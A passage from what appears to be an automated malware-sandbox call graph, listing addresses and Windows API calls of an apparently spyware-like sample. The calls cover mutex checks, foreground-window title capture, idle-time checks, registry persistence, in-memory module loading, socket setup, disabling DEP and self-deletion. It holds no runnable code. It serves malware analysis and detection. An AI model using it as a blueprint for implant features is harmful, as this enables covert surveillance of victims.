53949->53951 53952 413042 53950->53952 53953 401fd8 11 API calls 53951->53953 53954 401fd8 11 API calls 53952->53954 53955 413198 53953->53955 53956 41304b 53954->53956 53957 401fd8 11 API calls 53955->53957 53958 401fd8 11 API calls 53956->53958 53959 41309c 53957->53959 53960 413054 53958->53960 53962 401fd8 11 API calls 53959->53962 53961 401fd8 11 API calls 53960->53961 53963 413060 53961->53963 53964 4131aa 53962->53964 53965 401fd8 11 API calls 53963->53965 53966 401f09 11 API calls 53964->53966 53967 41306c 53965->53967 53969 4131b6 53966->53969 53968 401fd8 11 API calls 53967->53968 53971 413078 53968->53971 53970 401fd8 11 API calls 53969->53970 53972 4131c2 53970->53972 53973 401fd8 11 API calls 53971->53973 53974 401fd8 11 API calls 53972->53974 53975 413084 53973->53975 53976 4131ce 53974->53976 53977 401fd8 11 API calls 53975->53977 53978 401fd8 11 API calls 53976->53978 53979 413090 53977->53979 53980 4131da 53978->53980 53981 401fd8 11 API calls 53979->53981 53982 401fd8 11 API calls 53980->53982 53981->53959 53983 4131e6 53982->53983 53984 401fd8 11 API calls 53983->53984 53985 4131f2 53984->53985 53986 401fd8 11 API calls 53985->53986 53987 4131fe 53986->53987 53988 401fd8 11 API calls 53987->53988 53989 41320a 53988->53989 53990 401fd8 11 API calls 53989->53990 53991 413216 53990->53991 53992 401fd8 11 API calls 53991->53992 53993 412a83 53992->53993 53994 404e26 99 API calls 53993->53994 53994->53556 53996 40b90c 53995->53996 53997 402252 11 API calls 53996->53997 53998 40b917 53997->53998 54031 40b92c 53998->54031 54000 40b926 54000->53881 54003 41323c 54001->54003 54011 41326b 54001->54011 54002 41327a 54004 40417e 28 API calls 54002->54004 54043 411cf2 54003->54043 54006 413286 54004->54006 54008 401fd8 11 API calls 54006->54008 54009 412f28 54008->54009 54009->53889 54011->54002 54039 10001c5b 54011->54039 54014 41bd2b 54013->54014 54015 4020b7 28 API calls 54014->54015 54016 4130b1 54015->54016 54016->53897 54018 402eb0 54017->54018 54019 402ef2 54018->54019 54024 402ee7 54018->54024 54020 401fb0 28 API calls 54019->54020 54021 402ef0 54020->54021 54022 402055 11 API calls 54021->54022 54023 402f09 54022->54023 54023->53929 54142 403365 28 API calls 54024->54142 54143 441e81 54026->54143 54029 402093 28 API calls 54030 41bbc0 54029->54030 54030->53900 54032 40b966 54031->54032 54033 40b938 54031->54033 54038 4028a4 22 API calls 54032->54038 54034 4027e6 28 API calls 54033->54034 54037 40b942 54034->54037 54037->54000 54040 10001c6b ___scrt_fastfail 54039->54040 54047 100012ee 54040->54047 54042 10001c87 54042->54002 54089 411cfe 54043->54089 54046 411f67 22 API calls new 54046->54011 54048 10001324 ___scrt_fastfail 54047->54048 54049 100013b7 GetEnvironmentVariableW 54048->54049 54073 100010f1 54049->54073 54052 100010f1 57 API calls 54053 10001465 54052->54053 54054 100010f1 57 API calls 54053->54054 54055 10001479 54054->54055 54056 100010f1 57 API calls 54055->54056 54057 1000148d 54056->54057 54058 100010f1 57 API calls 54057->54058 54059 100014a1 54058->54059 54060 100010f1 57 API calls 54059->54060 54061 100014b5 lstrlenW 54060->54061 54062 100014d2 54061->54062 54063 100014d9 lstrlenW 54061->54063 54062->54042 54064 100010f1 57 API calls 54063->54064 54065 10001501 lstrlenW lstrcatW 54064->54065 54066 100010f1 57 API calls 54065->54066 54067 10001539 lstrlenW lstrcatW 54066->54067 54068 100010f1 57 API calls 54067->54068 54069 1000156b lstrlenW lstrcatW 54068->54069 54070 100010f1 57 API calls 54069->54070 54071 1000159d lstrlenW lstrcatW 54070->54071 54072 100010f1 57 API calls 54071->54072 54072->54062 54074 10001118 ___scrt_fastfail 54073->54074 54075 10001129 lstrlenW 54074->54075 54086 10002c40 54075->54086 54078 10001177 lstrlenW FindFirstFileW 54080 100011a0 54078->54080 54081 100011e1 54078->54081 54079 10001168 lstrlenW 54079->54078 54082 100011c7 FindNextFileW 54080->54082 54083 100011aa 54080->54083 54081->54052 54082->54080 54085 100011da FindClose 54082->54085 54083->54082 54088 10001000 57 API calls ___scrt_fastfail 54083->54088 54085->54081 54087 10001148 lstrcatW lstrlenW 54086->54087 54087->54078 54087->54079 54088->54083 54122 41179c 54089->54122 54091 411d1c 54092 411d32 SetLastError 54091->54092 54093 41179c SetLastError 54091->54093 54119 411cfa 54091->54119 54092->54119 54094 411d4f 54093->54094 54094->54092 54096 411d71 GetNativeSystemInfo 54094->54096 54094->54119 54097 411db7 54096->54097 54108 411dc4 SetLastError 54097->54108 54125 411ca3 VirtualAlloc 54097->54125 54100 411de7 54101 411e0c GetProcessHeap HeapAlloc 54100->54101 54135 411ca3 VirtualAlloc 54100->54135 54102 411e23 54101->54102 54103 411e35 54101->54103 54136 411cba VirtualFree 54102->54136 54106 41179c SetLastError 54103->54106 54109 411e7e 54106->54109 54107 411dff 54107->54101 54107->54108 54108->54119 54110 411f30 54109->54110 54126 411ca3 VirtualAlloc 54109->54126 54137 412077 GetProcessHeap HeapFree 54110->54137 54113 411e97 ctype 54127 4117af SetLastError ctype ___scrt_get_show_window_mode 54113->54127 54115 411ec3 54115->54110 54128 411b5f 26 API calls 54115->54128 54117 411ef0 54117->54110 54129 41194f 54117->54129 54119->54046 54120 411efb 54120->54110 54120->54119 54121 411f25 SetLastError 54120->54121 54121->54110 54123 4117a0 SetLastError 54122->54123 54124 4117ab 54122->54124 54123->54091 54124->54091 54125->54100 54126->54113 54127->54115 54128->54117 54130 411975 54129->54130 54132 411a70 54130->54132 54134 411a5e 54130->54134 54138 4118b2 54130->54138 54131 4118b2 VirtualProtect 54131->54132 54132->54120 54134->54131 54135->54107 54136->54108 54137->54119 54139 4118c3 54138->54139 54141 4118bb 54138->54141 54140 411936 VirtualProtect 54139->54140 54139->54141 54140->54141 54141->54130 54142->54021 54144 441e8d 54143->54144 54147 441c7d 54144->54147 54146 41bbb2 54146->54029 54148 441c94 54147->54148 54150 441ccb __cftof 54148->54150 54151 4405dd 20 API calls __dosmaperr 54148->54151 54150->54146 54151->54150 54152->53592 54154 4020f6 28 API calls 54153->54154 54155 415b0c SetEvent 54154->54155 54156 415b21 54155->54156 54157 4041a2 28 API calls 54156->54157 54158 415b3b 54157->54158 54159 4020f6 28 API calls 54158->54159 54160 415b4b 54159->54160 54161 4020f6 28 API calls 54160->54161 54162 415b5d 54161->54162 54163 41be1b 28 API calls 54162->54163 54164 415b66 54163->54164 54165 415cd6 54164->54165 54167 415b86 GetTickCount 54164->54167 54227 415ce5 54164->54227 54166 401e8d 11 API calls 54165->54166 54168 417092 54166->54168 54169 41bb8e 28 API calls 54167->54169 54171 401fd8 11 API calls 54168->54171 54172 415b97 54169->54172 54170 415cf9 54258 4050e4 84 API calls 54170->54258 54174 41709e 54171->54174 54232 41bae6 GetLastInputInfo GetTickCount 54172->54232 54177 401fd8 11 API calls 54174->54177 54176 415cc9 54176->54165 54179 4170aa 54177->54179 54178 415ba3 54180 41bb8e 28 API calls 54178->54180 54181 415bae 54180->54181 54233 41ba96 54181->54233 54184 41bd1e 28 API calls 54185 415bca 54184->54185 54186 401e65 22 API calls 54185->54186 54187 415bd8 54186->54187 54188 402f31 28 API calls 54187->54188 54189 415be6 54188->54189 54190 402ea1 28 API calls 54189->54190 54191 415bf5 54190->54191 54192 402f10 28 API calls 54191->54192 54193 415c04 54192->54193 54194 402ea1 28 API calls 54193->54194 54195 415c13 54194->54195 54196 402f10 28 API calls 54195->54196 54197 415c1f 54196->54197 54198 402ea1 28 API calls 54197->54198 54199 415c29 54198->54199 54200 404aa1 61 API calls 54199->54200 54201 415c38 54200->54201 54202 401fd8 11 API calls 54201->54202 54203 415c41 54202->54203 54204 401fd8 11 API calls 54203->54204 54205 415c4d 54204->54205 54206 401fd8 11 API calls 54205->54206 54207 415c59 54206->54207 54208 401fd8 11 API calls 54207->54208 54209 415c65 54208->54209 54210 401fd8 11 API calls 54209->54210 54211 415c71 54210->54211 54212 401fd8 11 API calls 54211->54212 54213 415c7d 54212->54213 54214 401f09 11 API calls 54213->54214 54215 415c86 54214->54215 54216 401fd8 11 API calls 54215->54216 54217 415c8f 54216->54217 54218 401fd8 11 API calls 54217->54218 54219 415c98 54218->54219 54220 401e65 22 API calls 54219->54220 54221 415ca3 54220->54221 54238 43baac 54221->54238 54224 415cb5 54228 415cc3 54224->54228 54229 415cce 54224->54229 54225 415cdb 54226 401e65 22 API calls 54225->54226 54226->54227 54227->54165 54227->54170 54242 404ff4 82 API calls 54228->54242 54243 404f51 54229->54243 54232->54178 54259 436e90 54233->54259 54236 40417e 28 API calls 54237 415bbc 54236->54237 54237->54184 54239 43bac5 _strftime 54238->54239 54261 43ae03 54239->54261 54241 415cb0 54241->54224 54241->54225 54242->54176 54244 404fea 54243->54244 54245 404f65 54243->54245 54244->54165 54246 404f6e 54245->54246 54247 404fc0 CreateEventA CreateThread 54245->54247 54248 404f7d GetLocalTime 54245->54248 54246->54247 54247->54244 54290 405150 54247->54290 54249 41bb8e 28 API calls 54248->54249 54250 404f91 54249->54250 54289 4052fd 28 API calls 54250->54289 54258->54176 54260 41bab5 GetForegroundWindow GetWindowTextW 54259->54260 54260->54236 54277 43ba0a 54261->54277 54263 43ae50 54283 43a7b7 36 API calls 3 library calls 54263->54283 54265 43ae15 54265->54263 54266 43ae2a 54265->54266 54276 43ae2f __cftof 54265->54276 54282 4405dd 20 API calls __dosmaperr 54266->54282 54269 43ae5c 54270 43ae8b 54269->54270 54284 43ba4f 40 API calls __Tolower 54269->54284 54273 43aef7 54270->54273 54285 43b9b6 20 API calls 2 library calls 54270->54285 54286 43b9b6 20 API calls 2 library calls 54273->54286 54274 43afbe _strftime 54274->54276 54287 4405dd 20 API calls __dosmaperr 54274->54287 54276->54241 54278 43ba22 54277->54278 54279 43ba0f 54277->54279 54278->54265 54288 4405dd 20 API calls __dosmaperr 54279->54288 54281 43ba14 __cftof 54281->54265 54282->54276 54283->54269 54284->54269 54285->54273 54286->54274 54287->54276 54288->54281 54293 40515c 102 API calls 54290->54293 54292 405159 54293->54292 54294->53122 54295->53124 54296 4165a0 54297 401e65 22 API calls 54296->54297 54298 4165b0 54297->54298 54299 4020f6 28 API calls 54298->54299 54300 4165bb 54299->54300 54301 401e65 22 API calls 54300->54301 54302 4165c6 54301->54302 54303 4020f6 28 API calls 54302->54303 54304 4165d1 54303->54304 54307 41292a 54304->54307 54308 40482d 3 API calls 54307->54308 54309 41293e 54308->54309 54310 4048c8 97 API calls 54309->54310 54311 412946 54310->54311 54312 402f31 28 API calls 54311->54312 54313 41295f 54312->54313 54314 402f10 28 API calls 54313->54314 54315 412969 54314->54315 54316 404aa1 61 API calls 54315->54316 54317 412973 54316->54317 54318 401fd8 11 API calls 54317->54318 54319 41297b 54318->54319 54320 404c10 273 API calls 54319->54320 54321 412989 54320->54321 54322 401fd8 11 API calls 54321->54322 54323 412991 54322->54323 54324 401fd8 11 API calls 54323->54324 54325 412999 54324->54325 54326 434887 54327 434893 ___FrameUnwindToState 54326->54327 54353 434596 54327->54353 54329 43489a 54331 4348c3 54329->54331 54651 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54329->54651 54336 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54331->54336 54652 444251 5 API calls _ValidateLocalCookies 54331->54652 54333 4348dc 54335 4348e2 ___FrameUnwindToState 54333->54335 54653 4441f5 5 API calls _ValidateLocalCookies 54333->54653 54342 434962 54336->54342 54654 4433e7 36 API calls 4 library calls 54336->54654 54364 434b14 54342->54364 54346 434984 54347 43498e 54346->54347 54656 44341f 28 API calls _abort 54346->54656 54348 434997 54347->54348 54657 4433c2 28 API calls _abort 54347->54657 54658 43470d 13 API calls 2 library calls 54348->54658 54352 43499f 54352->54335 54354 43459f 54353->54354 54659 434c52 IsProcessorFeaturePresent 54354->54659 54356 4345ab 54660 438f31 10 API calls 4 library calls 54356->54660 54358 4345b0 54363 4345b4 54358->54363 54661 4440bf 54358->54661 54361 4345cb 54361->54329 54363->54329 54365 436e90 ___scrt_get_show_window_mode 54364->54365 54366 434b27 GetStartupInfoW 54365->54366 54367 434968 54366->54367 54368 4441a2 54367->54368 54677 44f059 54368->54677 54370 4441ab 54371 434971 54370->54371 54681 446815 36 API calls 54370->54681 54373 40e9c5 54371->54373 54683 41cb50 LoadLibraryA GetProcAddress 54373->54683 54375 40e9e1 GetModuleFileNameW 54688 40f3c3 54375->54688 54377 40e9fd 54378 4020f6 28 API calls 54377->54378 54379 40ea0c 54378->54379 54380 4020f6 28 API calls 54379->54380 54381 40ea1b 54380->54381 54382 41be1b 28 API calls 54381->54382 54383 40ea24 54382->54383 54703 40fb17 54383->54703 54385 40ea2d 54386 401e8d 11 API calls 54385->54386 54387 40ea36 54386->54387 54388 40ea93 54387->54388 54389 40ea49 54387->54389 54390 401e65 22 API calls 54388->54390 54892 40fbb3 118 API calls 54389->54892 54392 40eaa3 54390->54392 54396 401e65 22 API calls 54392->54396 54393 40ea5b 54394 401e65 22 API calls 54393->54394 54395 40ea67 54394->54395 54893 410f37 36 API calls __EH_prolog 54395->54893 54397 40eac2 54396->54397 54399 40531e 28 API calls 54397->54399 54400 40ead1 54399->54400 54402 406383 28 API calls 54400->54402 54401 40ea79 54894 40fb64 78 API calls 54401->54894 54404 40eadd 54402->54404 54406 401fe2 28 API calls 54404->54406 54405 40ea82 54895 40f3b0 71 API calls 54405->54895 54408 40eae9 54406->54408 54409 401fd8 11 API calls 54408->54409 54410 40eaf2 54409->54410 54412 401fd8 11 API calls 54410->54412 54411 401fd8 11 API calls 54413 40eefb 54411->54413 54414 40eafb 54412->54414 54655 4432f6 GetModuleHandleW 54413->54655 54415 401e65 22 API calls 54414->54415 54416 40eb04 54415->54416 54417 401fc0 28 API calls 54416->54417 54418 40eb0f 54417->54418 54419 401e65 22 API calls 54418->54419 54420 40eb28 54419->54420 54421 401e65 22 API calls 54420->54421 54422 40eb43 54421->54422 54423 40ebae 54422->54423 54896 406c1e 54422->54896 54424 401e65 22 API calls 54423->54424 54430 40ebbb 54424->54430 54426 40eb70 54427 401fe2 28 API calls 54426->54427 54428 40eb7c 54427->54428 54431 401fd8 11 API calls 54428->54431 54429 40ec02 54707 40d069 54429->54707 54430->54429 54436 413549 3 API calls 54430->54436 54433 40eb85 54431->54433 54901 413549 RegOpenKeyExA 54433->54901 54434 40ec08 54435 40ea8b 54434->54435 54710 41b2c3 54434->54710 54435->54411 54442 40ebe6 54436->54442 54440 40f34f 54936 4139a9 30 API calls 54440->54936 54441 40ec23 54443 40ec76 54441->54443 54727 407716 54441->54727 54442->54429 54904 4139a9 30 API calls 54442->54904 54445 401e65 22 API calls 54443->54445 54448 40ec7f 54445->54448 54457 40ec90 54448->54457 54458 40ec8b 54448->54458 54450 40f365 54937 412475 65 API calls ___scrt_get_show_window_mode 54450->54937 54451 40ec42 54905 407738 30 API calls 54451->54905 54452 40ec4c 54455 401e65 22 API calls 54452->54455 54467 40ec55 54455->54467 54456 40f36f 54460 41bc5e 28 API calls 54456->54460 54463 401e65 22 API calls 54457->54463 54908 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 54458->54908 54459 40ec47 54906 407260 98 API calls 54459->54906 54464 40f37f 54460->54464 54465 40ec99 54463->54465 54790 413a23 RegOpenKeyExW 54464->54790 54731 41bc5e 54465->54731 54467->54443 54471 40ec71 54467->54471 54468 40eca4 54470 401f13 28 API calls 54468->54470 54473 40ecaf 54470->54473 54907 407260 98 API calls 54471->54907 54477 401f09 11 API calls 54473->54477 54475 401f09 11 API calls 54476 40f39c 54475->54476 54478 401f09 11 API calls 54476->54478 54479 40ecb8 54477->54479 54480 40f3a5 54478->54480 54481 401e65 22 API calls 54479->54481 54793 40dd42 54480->54793 54482 40ecc1 54481->54482 54486 401e65 22 API calls 54482->54486 54488 40ecdb 54486->54488 54487 40f3af 54489 401e65 22 API calls 54488->54489 54490 40ecf5 54489->54490 54491 401e65 22 API calls 54490->54491 54493 40ed0e 54491->54493 54492 40ed7b 54495 40ed8a 54492->54495 54500 40ef06 ___scrt_get_show_window_mode 54492->54500 54493->54492 54494 401e65 22 API calls 54493->54494 54499 40ed23 _wcslen 54494->54499 54496 40ed93 54495->54496 54524 40ee0f ___scrt_get_show_window_mode 54495->54524 54497 401e65 22 API calls 54496->54497 54498 40ed9c 54497->54498 54501 401e65 22 API calls 54498->54501 54499->54492 54502 401e65 22 API calls 54499->54502 54911 4136f8 RegOpenKeyExA 54500->54911 54503 40edae 54501->54503 54504 40ed3e 54502->54504 54506 401e65 22 API calls 54503->54506 54508 401e65 22 API calls 54504->54508 54507 40edc0 54506->54507 54511 401e65 22 API calls 54507->54511 54509 40ed53 54508->54509 54515 40da34 32 API calls 54509->54515 54510 40ef51 54512 401e65 22 API calls 54510->54512 54513 40ede9 54511->54513 54514 40ef76 54512->54514 54519 401e65 22 API calls 54513->54519 54520 402093 28 API calls 54514->54520 54516 40ed66 54515->54516 54517 401f13 28 API calls 54516->54517 54518 40ed72 54517->54518 54521 401f09 11 API calls 54518->54521 54522 40edfa 54519->54522 54523 40ef88 54520->54523 54521->54492 54909 40cdf9 46 API calls _wcslen 54522->54909 54745 41376f RegCreateKeyA 54523->54745 54735 413947 54524->54735 54529 40eea3 ctype 54533 401e65 22 API calls 54529->54533 54530 40ee0a 54530->54524 54531 401e65 22 API calls 54532 40efaa 54531->54532 54535 43baac _strftime 40 API calls 54532->54535 54534 40eeba 54533->54534 54534->54510 54538 40eece 54534->54538 54536 40efb7 54535->54536 54537 40efc1 54536->54537 54539 40efe4 54536->54539 54914 41cd9b 88 API calls ___scrt_get_show_window_mode 54537->54914 54540 401e65 22 API calls 54538->54540 54543 402093 28 API calls 54539->54543 54541 40eed7 54540->54541 54544 41bc5e 28 API calls 54541->54544 54546 40eff9 54543->54546 54547 40eee3 54544->54547 54545 40efc8 CreateThread 54545->54539 55336 41d45d 10 API calls 54545->55336 54548 402093 28 API calls 54546->54548 54910 40f474 114 API calls 54547->54910 54550 40f008 54548->54550 54552 41b4ef 80 API calls 54550->54552 54551 40eee8 54551->54510 54553 40eeef 54551->54553 54554 40f00d 54552->54554 54553->54435 54555 401e65 22 API calls 54554->54555 54556 40f019 54555->54556 54557 401e65 22 API calls 54556->54557 54558 40f02b 54557->54558 54559 401e65 22 API calls 54558->54559 54560 40f04b 54559->54560 54561 43baac _strftime 40 API calls 54560->54561 54562 40f058 54561->54562 54563 401e65 22 API calls 54562->54563 54564 40f063 54563->54564 54565 401e65 22 API calls 54564->54565 54566 40f074 54565->54566 54567 401e65 22 API calls 54566->54567 54568 40f089 54567->54568 54569 401e65 22 API calls 54568->54569 54570 40f09a 54569->54570 54571 40f0a1 StrToIntA 54570->54571 54751 409de4 54571->54751 54574 401e65 22 API calls 54575 40f0bc 54574->54575 54576 40f101 54575->54576 54577 40f0c8 54575->54577 54579 401e65 22 API calls 54576->54579 54915 4344ea 54577->54915 54581 40f111 54579->54581 54585 40f159 54581->54585 54586 40f11d 54581->54586 54582 401e65 22 API calls 54583 40f0e4 54582->54583 54584 40f0eb CreateThread 54583->54584 54584->54576 55339 419fb4 113 API calls 2 library calls 54584->55339 54588 401e65 22 API calls 54585->54588 54587 4344ea new 22 API calls 54586->54587 54590 40f126 54587->54590 54589 40f162 54588->54589 54593 40f1cc 54589->54593 54594 40f16e 54589->54594 54591 401e65 22 API calls 54590->54591 54592 40f138 54591->54592 54597 40f13f CreateThread 54592->54597 54595 401e65 22 API calls 54593->54595 54596 401e65 22 API calls 54594->54596 54598 40f1d5 54595->54598 54599 40f17e 54596->54599 54597->54585 55338 419fb4 113 API calls 2 library calls 54597->55338 54600 40f1e1 54598->54600 54601 40f21a 54598->54601 54602 401e65 22 API calls 54599->54602 54604 401e65 22 API calls 54600->54604 54776 41b60d GetComputerNameExW GetUserNameW 54601->54776 54605 40f193 54602->54605 54607 40f1ea 54604->54607 54922 40d9e8 54605->54922 54612 401e65 22 API calls 54607->54612 54608 401f13 28 API calls 54609 40f22e 54608->54609 54611 401f09 11 API calls 54609->54611 54614 40f237 54611->54614 54615 40f1ff 54612->54615 54617 40f240 SetProcessDEPPolicy 54614->54617 54618 40f243 CreateThread 54614->54618 54623 43baac _strftime 40 API calls 54615->54623 54616 401f13 28 API calls 54619 40f1b2 54616->54619 54617->54618 54621 40f264 54618->54621 54622 40f258 CreateThread 54618->54622 55308 40f7a7 54618->55308 54620 401f09 11 API calls 54619->54620 54624 40f1bb CreateThread 54620->54624 54625 40f279 54621->54625 54626 40f26d CreateThread 54621->54626 54622->54621 55340 4120f7 146 API calls 54622->55340 54627 40f20c 54623->54627 54624->54593 55335 401be9 50 API calls _strftime 54624->55335 54628 40f2cc 54625->54628 54630 402093 28 API calls 54625->54630 54626->54625 55337 4126db 38 API calls ___scrt_get_show_window_mode 54626->55337 54933 40c162 7 API calls 54627->54933 54787 4134ff RegOpenKeyExA 54628->54787 54631 40f29c 54630->54631 54934 4052fd 28 API calls 54631->54934 54636 40f2ed 54638 41bc5e 28 API calls 54636->54638 54640 40f2fd 54638->54640 54935 41361b 31 API calls 54640->54935 54645 40f313 54646 401f09 11 API calls 54645->54646 54649 40f31e 54646->54649 54647 40f346 DeleteFileW 54648 40f34d 54647->54648 54647->54649 54648->54456 54649->54456 54649->54647 54650 40f334 Sleep 54649->54650 54650->54649 54651->54329 54652->54333 54653->54336 54654->54342 54655->54346 54656->54347 54657->54348 54658->54352 54659->54356 54660->54358 54665 44fb68 54661->54665 54664 438f5a 8 API calls 3 library calls 54664->54363 54666 44fb81 54665->54666 54669 434fcb 54666->54669 54668 4345bd 54668->54361 54668->54664 54670 434fd6 IsProcessorFeaturePresent 54669->54670 54671 434fd4 54669->54671 54673 435018 54670->54673 54671->54668 54676 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54673->54676 54675 4350fb 54675->54668 54676->54675 54678 44f06b 54677->54678 54679 44f062 54677->54679 54678->54370 54682 44ef58 49 API calls 4 library calls 54679->54682 54681->54370 54682->54678 54684 41cb8f LoadLibraryA GetProcAddress 54683->54684 54685 41cb7f GetModuleHandleA GetProcAddress 54683->54685 54686 41cbb8 44 API calls 54684->54686 54687 41cba8 LoadLibraryA GetProcAddress 54684->54687 54685->54684 54686->54375 54687->54686 54938 41b4a8 FindResourceA 54688->54938 54691 43bd51 new 21 API calls 54692 40f3ed ctype 54691->54692 54693 4020b7 28 API calls 54692->54693 54694 40f408 54693->54694 54695 401fe2 28 API calls 54694->54695 54696 40f413 54695->54696 54697 401fd8 11 API calls 54696->54697 54698 40f41c 54697->54698 54699 43bd51 new 21 API calls 54698->54699 54700 40f42d ctype 54699->54700 54941 406dd8 54700->54941 54702 40f460 54702->54377 54704 40fb23 54703->54704 54706 40fb2a 54703->54706 54944 402163 11 API calls 54704->54944 54706->54385 54945 401fab 54707->54945 54709 40d073 CreateMutexA GetLastError 54709->54434 54711 41bfb7 2 API calls 54710->54711 54712 41b2d1 54711->54712 54946 4135a6 RegOpenKeyExA 54712->54946 54715 401fe2 28 API calls 54716 41b2ff 54715->54716 54717 401fd8 11 API calls 54716->54717 54718 41b307 54717->54718 54719 4135a6 31 API calls 54718->54719 54721 41b35d 54718->54721 54720 41b330 54719->54720 54722 41b33b StrToIntA 54720->54722 54721->54441 54723 41b349 54722->54723 54726 41b352 54722->54726 54951 41cf69 22 API calls 54723->54951 54725 401fd8 11 API calls 54725->54721 54726->54725 54728 40772a 54727->54728 54729 413549 3 API calls 54728->54729 54730 407731 54729->54730 54730->54451 54730->54452 54732 41bc72 54731->54732 54733 40b904 28 API calls 54732->54733 54734 41bc7a 54733->54734 54734->54468 54736 413965 54735->54736 54737 406dd8 28 API calls 54736->54737 54738 41397a 54737->54738 54739 4020f6 28 API calls 54738->54739 54740 41398a 54739->54740 54741 41376f 14 API calls 54740->54741 54742 413994 54741->54742 54743 401fd8 11 API calls 54742->54743 54744 4139a1 54743->54744 54744->54529 54746 4137bf 54745->54746 54749 413788 54745->54749 54747 401fd8 11 API calls 54746->54747 54748 40ef9e 54747->54748 54748->54531 54750 41379a RegSetValueExA RegCloseKey 54749->54750 54750->54746 54752 409e02 _wcslen 54751->54752 54753 409e24 54752->54753 54754 409e0d 54752->54754 54756 40da34 32 API calls 54753->54756 54755 40da34 32 API calls 54754->54755 54757 409e15 54755->54757 54758 409e2c 54756->54758 54759 401f13 28 API calls 54757->54759 54760 401f13 28 API calls 54758->54760 54775 409e1f 54759->54775 54761 409e3a 54760->54761 54762 401f09 11 API calls 54761->54762 54764 409e42 54762->54764 54763 401f09 11 API calls 54765 409e79 54763->54765 54967 40915b 28 API calls 54764->54967 54952 40a109 54765->54952 54768 409e54 54968 403014 54768->54968 54772 401f13 28 API calls 54773 409e69 54772->54773 54774 401f09 11 API calls 54773->54774 54774->54775 54775->54763 54777 40417e 28 API calls 54776->54777 54778 41b65c 54777->54778 55146 4042fc 54778->55146 54781 403014 28 API calls 54782 41b672 54781->54782 54783 401f09 11 API calls 54782->54783 54784 41b67b 54783->54784 54785 401f09 11 API calls 54784->54785 54786 40f223 54785->54786 54786->54608 54788 413520 RegQueryValueExA RegCloseKey 54787->54788 54789 40f2e4 54787->54789 54788->54789 54789->54480 54789->54636 54791 40f392 54790->54791 54792 413a3f RegDeleteValueW 54790->54792 54791->54475 54792->54791 54794 40dd5b 54793->54794 54795 4134ff 3 API calls 54794->54795 54796 40dd62 54795->54796 54797 40dd81 54796->54797 55221 401707 54796->55221 54801 414f2a 54797->54801 54799 40dd6f 55224 413877 RegCreateKeyA 54799->55224 54802 4020df 11 API calls 54801->54802 54803 414f3e 54802->54803 55238 41b8b3 54803->55238 54806 4020df 11 API calls 54807 414f54 54806->54807 54808 401e65 22 API calls 54807->54808 54809 414f62 54808->54809 54810 43baac _strftime 40 API calls 54809->54810 54811 414f6f 54810->54811 54812 414f81 54811->54812 54813 414f74 Sleep 54811->54813 54814 402093 28 API calls 54812->54814 54813->54812 54815 414f90 54814->54815 54816 401e65 22 API calls 54815->54816 54817 414f99 54816->54817 54818 4020f6 28 API calls 54817->54818 54819 414fa4 54818->54819 54820 41be1b 28 API calls 54819->54820 54821 414fac 54820->54821 55242 40489e WSAStartup 54821->55242 54823 414fb6 54824 401e65 22 API calls 54823->54824 54825 414fbf 54824->54825 54826 401e65 22 API calls 54825->54826 54887 41503e 54825->54887 54827 414fd8 54826->54827 54830 401e65 22 API calls 54827->54830 54828 401e65 22 API calls 54828->54887 54829 4020f6 28 API calls 54829->54887 54831 414fe9 54830->54831 54833 401e65 22 API calls 54831->54833 54832 41be1b 28 API calls 54832->54887 54834 414ffa 54833->54834 54835 401e65 22 API calls 54834->54835 54837 41500b 54835->54837 54836 406c1e 28 API calls 54836->54887 54838 401e65 22 API calls 54837->54838 54840 41501c 54838->54840 54839 401fe2 28 API calls 54839->54887 54842 401e65 22 API calls 54840->54842 54841 401fd8 11 API calls 54841->54887 54843 41502e 54842->54843 55267 40473d 89 API calls 54843->55267 54846 41518c WSAGetLastError 55268 41cae1 30 API calls 54846->55268 54847 40482d 3 API calls 54847->54887 54850 402093 28 API calls 54852 41519c 54850->54852 54851 404f51 105 API calls 54851->54887 54852->54850 54854 41b4ef 80 API calls 54852->54854 54857 401e8d 11 API calls 54852->54857 54858 401e65 22 API calls 54852->54858 54859 43baac _strftime 40 API calls 54852->54859 54852->54887 54889 415a71 CreateThread 54852->54889 54890 401fd8 11 API calls 54852->54890 54891 401f09 11 API calls 54852->54891 55269 4052fd 28 API calls 54852->55269 55270 40b051 85 API calls 54852->55270 55271 404e26 99 API calls 54852->55271 54853 4048c8 97 API calls 54853->54887 54854->54852 54856 40531e 28 API calls 54856->54887 54857->54852 54858->54852 54860 415acf Sleep 54859->54860 54860->54852 54861 406383 28 API calls 54861->54887 54862 402093 28 API calls 54862->54887 54863 41b4ef 80 API calls 54863->54887 54866 40905c 28 API calls 54866->54887 54867 441e81 20 API calls 54867->54887 54868 4136f8 3 API calls 54868->54887 54869 4135a6 31 API calls 54869->54887 54870 40417e 28 API calls 54870->54887 54873 401e65 22 API calls 54874 415439 GetTickCount 54873->54874 54875 41bb8e 28 API calls 54874->54875 54875->54887 54877 41bb8e 28 API calls 54877->54887 54878 41ba96 30 API calls 54878->54887 54880 41bd1e 28 API calls 54880->54887 54881 402f31 28 API calls 54881->54887 54882 402ea1 28 API calls 54882->54887 54883 402f10 28 API calls 54883->54887 54884 404aa1 61 API calls 54884->54887 54885 401f09 11 API calls 54885->54887 54886 404c10 273 API calls 54886->54887 54887->54828 54887->54829 54887->54832 54887->54836 54887->54839 54887->54841 54887->54846 54887->54847 54887->54851 54887->54852 54887->54853 54887->54856 54887->54861 54887->54862 54887->54863 54887->54866 54887->54867 54887->54868 54887->54869 54887->54870 54887->54873 54887->54877 54887->54878 54887->54880 54887->54881 54887->54882 54887->54883 54887->54884 54887->54885 54887->54886 55243 414ee9 54887->55243 55248 41b7e0 54887->55248 55251 4145bd 54887->55251 55254 40dd89 54887->55254 55260 41bc42 54887->55260 55263 41bae6 GetLastInputInfo GetTickCount 54887->55263 55264 40f8d1 GetLocaleInfoA 54887->55264 54889->54852 55304 41ad17 106 API calls 54889->55304 54890->54852 54891->54852 54892->54393 54893->54401 54894->54405 54897 4020df 11 API calls 54896->54897 54898 406c2a 54897->54898 54899 4032a0 28 API calls 54898->54899 54900 406c47 54899->54900 54900->54426 54902 40eba4 54901->54902 54903 413573 RegQueryValueExA RegCloseKey 54901->54903 54902->54423 54902->54440 54903->54902 54904->54429 54905->54459 54906->54452 54907->54443 54908->54457 54909->54530 54910->54551 54912 41371e RegQueryValueExA RegCloseKey 